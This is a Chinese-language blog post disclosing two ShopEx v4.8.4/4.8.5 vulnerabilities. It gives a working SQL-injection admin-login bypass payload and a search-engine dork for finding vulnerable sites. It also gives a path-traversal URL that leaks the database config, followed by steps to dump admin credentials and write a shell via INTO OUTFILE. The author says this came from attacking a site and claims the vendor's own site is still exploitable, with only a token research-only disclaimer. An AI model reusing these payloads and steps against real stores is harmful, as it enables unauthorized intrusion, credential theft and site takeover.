shopex v4.8.5 漏洞

shopex v4.8.5 漏洞

本人声明:

只做技术研究,请勿破坏….谢谢.

漏洞原因:

直接看代码:
public function tryLogin( $aValue, $issuper = false )
{
if ( $aValue[‘passwd’] == “+_-_-_+” )
{
$aValue[‘passwd’] = “”;
}
$sql = “SELECT * FROM sdb_operators WHERE username = ‘{$aValue[‘usrname’]}’ AND userpass = ‘”.md5( $aValue[‘passwd’] ).”‘ AND disabled=’false’”;
if ( $issuper )
{
$sql .= ” AND super=’1′”;
}
return $this->db->selectrow( $sql );
}

这里$aValue[‘usrname’]没有任何过滤直接查询(没想到shopex还爆这种低级漏洞)。

利用方法:

在baidu,google直接搜索 Powered by ShopEx v4.8.5

ps:这就是版权信息带来的困惑。一出漏洞。别人就可以用版权信息找到你。
想去除shopex版权信息的去看 http://www.lp1987.cn/62.html

直接在后台登陆 用户名的地方输入

‘ or ‘1′=’1′ or ‘1′=’1

密码随便输,验证码输正确,直接进入后台。

SQL查询语句就变成这个样子了直接通过
SELECT * FROM sdb_operators WHERE username = ” or ‘1′=’1′ or ‘1′=’1′ AND userpass = ‘x’ AND disabled=’false’

看到此文章的shopex用户赶紧打官方的最新补丁….

另外一个漏洞:

_____________________________________

Shopex V4.8.4 V4.8.5 0Day 通杀
利用前提是程序所应用的数据库服务器,可以外连.这个很关键.

自己搞站时候.遇见的站,网上找不到该版本的漏洞,自己拿回源码读了一下.

找到一个漏洞.还是发出来吧.

http://www.target.com/shopadmin/index.php?ctl=sfile&act=getDB&p[0]=../../config/config.php

mysql -h1.1..1.1 -uuser -ppass

use yourbasename;

select * from sdb_operators;

得到管理员用户密码./shopadmin/ 登陆

后台拿shell,没有仔细研究.

我测试的站,直接用into outfile 一个shell.

网上有个帖子,说可以爆物理路径.测试不可用.

如果install目录没删.下面这个可以看phpinfo


http://www.target.com/install/svinfo.php?phpinfo=true

另外/home/cache/目录的文件,也是可以爆出来的.

目前shopex 官方站,仍然存在该漏洞

发表回复

您的电子邮箱地址不会被公开。 必填项已用*标注